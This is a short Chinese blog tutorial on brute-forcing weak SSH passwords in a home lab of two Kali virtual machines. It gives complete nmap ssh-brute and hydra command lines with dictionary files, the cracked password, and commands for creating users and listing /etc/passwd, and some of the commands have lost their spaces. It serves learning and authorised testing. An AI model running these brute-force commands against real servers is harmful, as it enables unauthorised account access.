简述两种爆破ssh弱口令的方法

SSH 为 Secure Shell 的缩写,由 IETF 的网络小组(Network Working Group)所制定;SSH 为建立在应用层基础上的安全协议。SSH 是目前较可靠,专为远程登录会话和其他网络服务提供安全性的协议。利用 SSH 协议可以有效防止远程管理过程中的信息泄露问题。SSH最初是UNIX系统上的一个程序,后来又迅速扩展到其他操作平台。SSH在正确使用时可弥补网络中的漏洞。SSH客户端适用于多种平台。几乎所有UNIX平台—包括HP-UX、Linux、AIX、Solaris、Digital UNIX、Irix,以及其他平台,都可运行SSH。

简单来说,在很多运维场景,都会使用ssh远程操作linux服务器。虽然它相对于telnet已经安全很多,但是也架不住最原始最直接的暴力破解法。以下是小白刚刚学到的两种办法:

1、使用nmap爆破:

命令如下:

nmap -p 22 --script=ssh-brute --script-args userdb=用户字典,passdb=密码字典 目标机ip

例如:

nmap-p22--script=ssh-brute --script-args userdb=2.txt,passdb=1.txt192.168.229.129

就是在构建好用户字典2.txt和密码字典1.txt后,尝试爆破192.168.229.129的ssh登陆口令。

最终爆破得到密码为:aaaaaa。

2、使用hydra爆破:

hydra -l root -P ssh_password.txt 目标机ip ssh  -v

其中-l 指定用户名,可以使用-L指定用户名字典文件;-p指定密码,-P指定密码字典文件;-v显示详细的执行过程。

例如:

hydra-lezpd-P1.txt192.168.229.129ssh-v

就是在构建好密码字典1.txt后,尝试爆破192.168.229.129的用户ezpd的密码。

同样得到密码:aaaaaa。

简单比较一下:

1、hydra使用起来更灵活。在已知用户名的情况下,使用hydra会更方便一些。

2、两个工具都不止于爆破ssh密码,nmap还能扫描网络,hydra还能爆破表单等。

啰嗦一句我的测试环境:用vmware 15 创建的两个kali虚拟机,一个ip为192.168.229.128,一个ip为192.168.229.129。在129这台创建一个用户ezpd,密码为:aaaaaa。然后启动ssh服务。

再啰嗦一句:

创建用户的命令为:

adduser用户名

这条命令是引导式的,接下来按照提示输入密码,一顿回车就行。

还啰嗦一句:

启动ssh服务的命令为:

servicesshd start

最后啰嗦一句:

可以通过passwd文件,查看linux有哪些用户。命令为:

cat/etc/passwd


更多内容,欢迎到我的微信公众号:互联网小白,交流讨论!

推荐阅读更多精彩内容

  • 本文是Medusa和Hydra快速入门手册的第二部分,第一部分的传送门这两篇也是后续爆破篇的一部分,至于字典,放在...
    LinuxSelf阅读 1,993评论 0 4
  • 大家好,这次我们的教程是, SSH暴力破解。 本次教程分为两块,第一块是Windows系统下的SSH暴力破解;第二...
    PhilTsai阅读 7,643评论 0 5
  • 关于Hydra hydra 是一个支持众多协议的爆破工具,已经集成到KaliLinux中,直接在终端打开即可 以...
    MangfuStudio阅读 19,287评论 0 13
  • 今天主要是初步介绍一些Hydra和Medusa的分析和内容,旨在方便快速入门,这是第一部分Medusa,后面附带一...
    LinuxSelf阅读 1,584评论 0 1
  • 要知道宽容犹如冬日正午的阳光, 能融化别人心田的冰雪变成潺潺细流。 一个不懂爱的人, 一个不懂得宽容别人的人, 会...
    快乐的子亿阅读 74评论 0 3